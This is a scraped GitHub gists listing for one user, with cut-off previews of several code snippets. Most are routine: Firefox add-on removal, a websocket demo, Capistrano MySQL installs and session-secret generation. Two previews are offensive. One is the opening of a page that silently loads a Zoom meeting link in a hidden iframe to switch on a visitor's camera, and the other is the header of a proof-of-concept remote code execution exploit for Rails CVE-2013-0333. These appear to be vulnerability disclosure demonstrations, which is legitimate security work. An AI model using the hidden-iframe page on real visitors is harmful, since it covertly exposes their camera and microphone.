Steve Schwartz JangoSteve
View zoom_exploit.html
<body>
<h1>Totally not a phishing site to enable your camera and possibly microphone</h1>
<script>
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "https://zoom.us/j/492468757";
document.body.appendChild(iframe);
setTimeout( function() {
iframe.parentNode.removeChild(iframe);
JangoSteve / uninstall_extension.js
Last active August 29, 2015 14:02
Programmatically uninstall an old version of an extension with a different UUID (i.e. loading new version with changed UUID would install side-by-side)
const {Cu} = require("chrome");
Cu.import("resource://gre/modules/AddonManager.jsm");
AddonManager.getAllAddons(function(aAddons) {
// Here aAddons is an array of Addon objects
var len = aAddons.length;
console.log("Addons!");
for (var i = 0; i < len; i++) {
var addon = aAddons[i];
console.log(addon.id, addon.name, addon.version, addon.isActive, addon.userDisabled);
JangoSteve / abstract.js
Created May 17, 2013 17:41
Websocket Presentation Abstract
// Steve (server)
var WebSocketServer = require('ws').Server
, wss = new WebSocketServer({port: 8080});
wss.on('connection', function(ws) {
ws.on('message', function(message) {
ws.send("Sure thing, how's this?");
});
});
// Brian (browser)
JangoSteve / rails_omakase.rb
Last active December 12, 2015 01:58 — forked from postmodern/rails_omakase.rb
Works with Rails 2.2.x on Ruby 1.8.7. Really harmless, but if you see a `#<ActionController>` object in your params, that's bad.
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0333)
#
# ## Advisory
#
# https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
#
# ## Caveats
#
JangoSteve / setup_load_paths.rb
Created August 23, 2012 02:03
Passenger RVM script in config
if ENV['MY_RUBY_HOME'] && ENV['MY_RUBY_HOME'].include?('rvm')
begin
rvm_path = File.dirname(File.dirname(ENV['MY_RUBY_HOME']))
if ENV['RAILS_ENV'] == 'production'
rvm_lib_path = "/usr/local/rvm/lib"
else
rvm_lib_path = File.join(rvm_path, 'lib')
end
$LOAD_PATH.unshift rvm_lib_path
require 'rvm'
JangoSteve / controller.js
Created July 23, 2012 23:42
Example ExpressJS view with partials
app.get('/', function(req, res) {
// [clipped] set user
res.render('index', {user: user});
});
JangoSteve / gist:2294823
Created April 3, 2012 19:13 — forked from bruno-/gist:2294117
Capistrano mysql interactive installation
desc "Install the latest stable release of MySql."
task :install, roles: :db, only: {primary: true} do
#run "echo #{mysql_password}"
run "#{sudo} apt-get -y update"
run "#{sudo} apt-get -y install mysql-server" do |channel, stream, data|
# prompts for mysql root password (when blue screen appears)
channel.send_data("#{mysql_root_password}\n\r") if data =~ /password/
end
run "#{sudo} apt-get -y install mysql-client libmysqlclient-dev"
end
JangoSteve / mysql_install.rb
Created March 31, 2012 18:21
Install mysql with capistrano on Ubuntu server
namespace :slicehost do
# The following will install mysql with default user/pw.
# Be sure to setup proper user/pw via mysql.
desc "Install MySQL"
task :install_mysql, :roles => :app do
apt_quiet_install('mysql-server libmysql-ruby')
#sudo "apt-get install mysql-server libmysql-ruby -y"
end
JangoSteve / redmine_trunk_on_heroku.md
Created March 1, 2012 21:39
Importing Redmine to Git, Deploying to Heroku
JangoSteve / session_secret.rb
Created March 1, 2012 21:13
Generate session secret
require 'securerandom' # Ruby stdlib; ActiveSupport::SecureRandom was removed in Rails 3.2
# 30 random bytes from the system CSPRNG, hex-encoded (60 characters)
random_string = SecureRandom.hex(30)
puts random_string